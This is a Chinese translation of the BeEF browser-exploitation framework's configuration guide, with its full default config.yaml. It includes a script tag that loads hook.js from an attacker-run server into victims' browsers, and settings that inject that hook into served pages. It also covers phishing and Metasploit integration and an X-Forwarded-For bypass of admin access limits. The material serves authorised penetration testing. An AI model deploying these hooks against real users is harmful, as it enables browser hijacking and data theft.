BeEF配置

介绍

BeEF利用YAML文件来配置核心功能以及扩展名。大多数核心BeEF配置位于主配置文件:中config.yaml,位于BeEF目录中。

要配置扩展名,请修改config.yaml您要修改的扩展名文件夹中的文件。有关命令模块配置文件的更多信息,请参见:命令模块配置。

认证方式

证书

为了使用BeEF,您必须更改用户名和密码。

导航到BeEF目录,然后使用您喜欢的文本编辑器(Vim,Nano等)进行编辑config.yaml

请更新以下示例中显示的部分:

 #Credentials to authenticate in BeEF.
    #Used by both the RESTful API and the Admin interface
    credentials:
        user:   "beef" 
        passwd: "something unique and complex"

存取控制

网络限制

可以通过子网限制用于挂钩或管理BeEF的Web界面。这是在

$ beef/config.yaml 

在接口/ IP限制

$ beef/config.yaml.beef.restrictions.https

可以通过子网限制用于管理BeEF的Web界面。

这可以在beef/config.yaml中完成。接口/ IP限制下的文件中完成此操作(beef/config.yaml.beef.restrictions.https)。

应该使用 permitted_ui_subnet 访问控制来限制对管理界面的访问。

例如:

 restrictions:
        permitted_hooking_subnet: ["10.1.0.0/16"]
        permitted_ui_subnet: ["127.0.0.1/32"]

可以绕过这些访问限制,不应仅依赖这些访问限制。

理想情况下,BeEF应该在反向代理后面运行,该反向代理会剥离用户提供的代理标头,例如X-Forwarded-For。本permitted_ui_subnet应仅限于127.0.0.1/32,并通过SSH隧道访问。如果使用反向代理,则allow_reverse_proxy默认false需要更改为的配置设置true。这将使用X-Forwarded-For代理标头中的IP地址来确定是否允许该请求访问Admin UI。注意:如果此设置是true直接访问用户界面,或者反向代理无法剥离用户提供的与路由相关的HTTP标头(例如),则可以将IP地址欺骗到管理用户界面X-Forwarded-For

虽然不可能绕过/32访问控制,但是可以绕过更宽松的访问控制,例如/24/16。在这些情况下,可以通过在X-Forwarded-For标头中允许的范围内提供有效的IP地址来绕过IP地址访问控制。

例如,permitted_ui_subnet: ["10.1.1.1/24"]可以通过提供来绕过X-Forwarded-For: 10.1.1.123

通过猜测正确子网中的有效IP地址,未经授权的用户可以通过在活动中尝试识别有效IP地址来推断目标的IP地址permitted_hooking_subnet。或在permitted_ui_subnet不使用/32IP范围的情况下访问管理员界面。

管理界面

面板路径也应使用beef.extension.admin_ui.base_path配置选项(即文件的“扩展”>“管理UI”小节)进行beef/config.yaml更改。

请注意,这此安全性并不会阻止对/api/REST接口的攻击。

登录限制

默认情况下,管理UI将登录尝试限制为每秒1次尝试。可以通过更改中的beef.extensions.admin_ui.login_fail_delay值进行更改extensions/admin_ui/config.yaml

默认情况下,REST API接口将登录尝试限制为每0.05秒进行1次尝试。可以通过更改中的beef.restrictions.api_attempt_delay值进行更改config.yaml

hook.js

动态生成的JavaScript hook文件hook.js将自动挂载在/hook.js中。

如果您的BeEF服务器是123.123.123.123:3000,则可以使用HTML脚本标记包括该脚本,如下所示:

<script src =“ http://123.123.123.123:3000/hook.js”> </ script>

Web服务器配置

可以完全配置Web服务器,这在config.yaml文件的HTTP小节中完成:

 http:
        debug: false # Will print verbose message in BeEF console
        host: "0.0.0.0" # IP address of the web server
        port: "3000" #Port of the web server

        # If BeEF is running behind a reverse proxy or NAT
        #  set the public hostname and port here
        public: "8.7.6.5"
        public_port: "3000"

        dns: "localhost" # Address of DNS server
        hook_file: "/hook.js" # Path for hooking script
        hook_session_name: "BEEFHOOK" #Name of session
        session_cookie_name: "BEEFSESSION" # Name of BeEF cookie

web服务器模仿

BeEF还具有基本的网络服务器模仿功能。可以使用beef.http.web_server_imitation指令更改根页面和HTTP 404错误页面以反映几种流行的Web服务器(Apache,IIS,NGINX)。

例如:

# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page

hook_404hook_root指令启用后可分别注入对HTTP 404错误页面的BeEF hook 和Web根页面。这将连接所有检查web服务器的浏览器。

配置扩展

启用扩展

扩展应该在main中启用config.yaml

extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
             shell:
                enable: false

在使用BeEF时,应该通过在config.yaml中设置enable: false来禁用演示扩展。

Metasploit

要启用Metasploit,您需要beef/config.yaml.beef.extensions.metasploit通过将值更改为true 来启用它。

extension:
       admin_ui:
              metasploit:
                   enable: true

应该通过修改其中的配置文件来配置Metasploit扩展extensions/metasploit/config.yml(请参见下文)beef/extensions/metasploit/config.yaml.beef.extensions.metasploit

   name: 'Metasploit'
            enable: true
            host: "127.0.0.1"
            port: 55552
            user: "msf"
            pass: "<password>"
            uri: '/api'
            ssl: true
            ssl_version: 'TLS1'
            ssl_verify: true
            callback_host: "127.0.0.1"
            autopwn_url: "autopwn"

请务必更改pass字段。
对Metasploit RPC服务的身份验证访问可用于在底层操作系统上执行任意命令。

除了host和callback_host参数之外,大多数配置都可以保留默认值,它们应该具有可以访问Metasploit的主机的IP地址。

在下一步(在用户和密码信息之前)使用下面相同的主机。

要启用RPC通信,需要在Metasploit中启动以下命令:

load msgrpc ServerHost=127.0.0.1 User=msf Pass=<password> SSL=y

这个命令可以写入一个文件,并通过-r选项启动到msfconsole
通常在Metasploit终端中运行它更容易。使配置文件中的设置(host,user, passssl)与配置文件中的相同。
当然,IP地址和密码应该与前面的YAML配置文件一致。

启动BEEF

现在,您可以通过beef在根目录中启动脚本来启动BeEF。

您还可以使用以下选项:

Usage: beef [options]
    -x, --reset                      Reset the database
    -v, --verbose                    Display debug information
    -a, --ascii_art                  Prints BeEF ascii art
    -c, --config FILE                Load a different configuration file: if it's called custom-config.yaml, git automatically ignores it.
    -p, --port PORT                  Change the default BeEF listening port
    -w, --wsport WS_PORT             Change the default BeEF WebSocket listening port

config.yanl内容:

#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file

beef:
    version: '0.5.0.0-alpha-pre'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    # Used for generating secure tokens
    crypto_default_value_length: 80

    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin interface
    credentials:
        user:   "beef"
        passwd: "beef"

    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
        # slow API calls to 1 every  api_attempt_delay  seconds
        api_attempt_delay: "0.05"

    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"

        # Decrease this setting to 1,000 (ms) if you want more responsiveness
        #  when sending modules and retrieving results.
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000

        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
        #   set the public hostname below:
        #public: ""      # public hostname/IP address

        # Reverse Proxy / NAT
        # If you want BeEF to be accessible behind a reverse proxy or NAT,
        #   set both the publicly accessible hostname/IP address and port below:
        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
        #   by altering the X-FORWARDED-FOR ip address in the request header.
        allow_reverse_proxy: false
        #public: ""      # public hostname/IP address
        #public_port: "" # public port (experimental)

        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"

        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"

        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            port: 61985 # WS: good success rate through proxies
            # Use encrypted 'WebSocketSecure'
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        file: "beef.db"

    # Autorun Rule Engine
    autorun:
        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000

        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true

    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false

    # IP Geolocation
    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
    geoip:
        enable: true
        database: '/opt/GeoIP/GeoLite2-City.mmdb'

    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
    integration:
        phishing_frenzy:
            enable: false

    # You may override default extension configuration parameters here
    # Note: additional experimental extensions are available in the 'extensions' directory
    #       and can be enabled via their respective 'config.yaml' file
    extension:
        admin_ui:
            enable: true
            base_path: "/ui"
        demos:
            enable: true
        events:
            enable: true
        evasion:
            enable: false
        requester:
            enable: true
        proxy:
            enable: true
        network:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
        xssrays:
            enable: true

本文章首发在 网安wangan.com 网站上。

上一篇 下一篇
讨论数量: 0
只看当前版本


暂无话题~